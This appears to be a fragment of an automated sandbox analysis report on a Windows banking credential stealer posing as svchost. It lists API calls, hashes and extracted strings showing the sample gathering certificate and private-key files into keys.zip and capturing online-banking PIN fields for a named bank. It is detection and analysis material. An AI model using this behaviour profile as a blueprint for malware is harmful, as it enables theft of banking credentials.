                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • EntryPoint.SVCHOST(00000000), ref: 00402C76
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryEntryExistsExitFindFreeHeaderImageMoveNamePathPointQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265EB4E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1), ref: 0265EB7A
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265EBBD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265EBC3
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265EBCB
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265EBDC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265EBE3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265EC1B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265EC28
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1,?,?), ref: 0265EC67
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0265ECA5
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265ECAC
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265ECB4
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 0265ECC5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265ECCC
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265ED06
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 0265ED31
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 0265ED55
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 0265ED72
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265ED79
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265ED8B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265ED9C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265EDAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265EDAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265EDBB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265EDBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 8a99a7e1$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1472338570-720286650
                                                                                                                                                                                                              • Opcode ID: 4b7d128d59e571c61fb1a584a5247b90ded47b3ea88cee1412258900588a2754
                                                                                                                                                                                                              • Instruction ID: ca519601e95f1586ddbba4169b083057f84d6393eaff7e2a622c49a4326d73b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b7d128d59e571c61fb1a584a5247b90ded47b3ea88cee1412258900588a2754
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D710430940765AFDF218B349C58BAE7FE8AF45701F458A84ED86D7380DB71DA84CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                              • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                              • API String ID: 3942648141-1626032180
                                                                                                                                                                                                              • Opcode ID: 49981197890cd11dd4ed3d5f7b243a2c638bf4b6ecef69bc8752cdedb7ecacc5
                                                                                                                                                                                                              • Instruction ID: cc8f7cd94319db6c5381b87b317d3ade5122ec2caec096b19ed7dd9f1164a5d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49981197890cd11dd4ed3d5f7b243a2c638bf4b6ecef69bc8752cdedb7ecacc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01D15AB1A042A19FC7214F3C8CD477ABFE6AF46204F5946A8EC85CB742E736D589CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: 8A99A689$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                              • API String ID: 3912299499-2396694000
                                                                                                                                                                                                              • Opcode ID: 89d5b71eaa4c1533ed553f81f571b88c6e6280ca0dd49690a96df98b8e272770
                                                                                                                                                                                                              • Instruction ID: 2fdd44c54ba4905d45cf3871eb25667e52c9470e5fd6fddf8ed9119e1ae63af0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89d5b71eaa4c1533ed553f81f571b88c6e6280ca0dd49690a96df98b8e272770
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36E12B70D0035A9FCB51CFA8D950AEEBBF4AF49304F1096AAD949E7310E7349694CF94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions
                                                                                                                                                                                                              • API String ID: 3028510665-1934172683
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026620EE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5), ref: 0266212F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5), ref: 0266216B
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02662180
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266218A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662192
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026621A3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026621AA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 026621E2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 026621EF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5,?,?), ref: 02662237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: 8a99a2c5$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1668326001-1989694494
                                                                                                                                                                                                              • Opcode ID: 89ade1819320593081621fd09c5ac8f03db6165053e0803473a52f68befaba0e
                                                                                                                                                                                                              • Instruction ID: d64f0e976925c9cce7b587b65f8d2ac45c985aa5870affeb4362d283d07aec9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ade1819320593081621fd09c5ac8f03db6165053e0803473a52f68befaba0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E711830940345AFDB219B789CACBFE7BE8AF45704F558694EA86D7340DF709584CB90
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: open$taskmgr
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02661A83
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02661A92
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02661AA1
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661ACD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661B03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02661B6C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02661B76
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02661B7E
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02661B8F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02661B96
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02661BA3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02661BCD
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02661BF2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02658A50), ref: 02661C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02661C29
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02661C33
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02661C3E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02661C45
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02661C53
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02661C64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                              • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 0265F05D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5), ref: 0265F09E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5), ref: 0265F0D2
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F0E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F0F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F0F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F10A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F111
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265F14B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265F158
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5,0268FDB8,0268FDB9), ref: 0265F199
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F1D4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F1DE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F1E6
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F1F7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F1FE
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265F23B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265F248
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265F420,0268FDB8,00000000,00000000), ref: 0265F27E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265F296
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265F2A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                              • String ID: 8A99A7A5$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265D278
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,found.), ref: 0265D293
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,asus), ref: 0265D2AE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265D2D4
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265D30E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265D318
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265D320
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265D32F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265D336
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689,?,?), ref: 0265D3D9
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265D413
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265D41D
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265D425
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265D434
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265D43B
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0265D52F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 0265D563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                              • String ID: .txt$.zip$8A99A689$asus$found.$keys$path
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664037
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02664075
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266407F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02664087
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02664098
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0266409F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?), ref: 026640FD
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0266410C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664137
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02664197
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C,?,00000000), ref: 026641D7
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02664237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 2433436401-604994656
                                                                                                                                                                                                              • Opcode ID: 06228bc8786fb8bdb0b219f5ac0fd007ad4e06701bf1b016ee49c69a4e950dc6
                                                                                                                                                                                                              • Instruction ID: a5d072744e9c14fec9cfac91b5e945b3dbcbbf2bae0832fce28ebed1445ac745
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06228bc8786fb8bdb0b219f5ac0fd007ad4e06701bf1b016ee49c69a4e950dc6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03B1FB319006495BDF2ADB7898AC7FE7BE5BF49300F144AA8D996D7340EF719988CB40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0264DA2D
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0264DA3E
                                                                                                                                                                                                                • Part of subcall function 0264D970: GetComputerNameA.KERNEL32(0268F588,?), ref: 0264D987
                                                                                                                                                                                                                • Part of subcall function 0264D970: lstrlenA.KERNEL32(0268F588,?,?,026576EC), ref: 0264D992
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9D2
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9E2
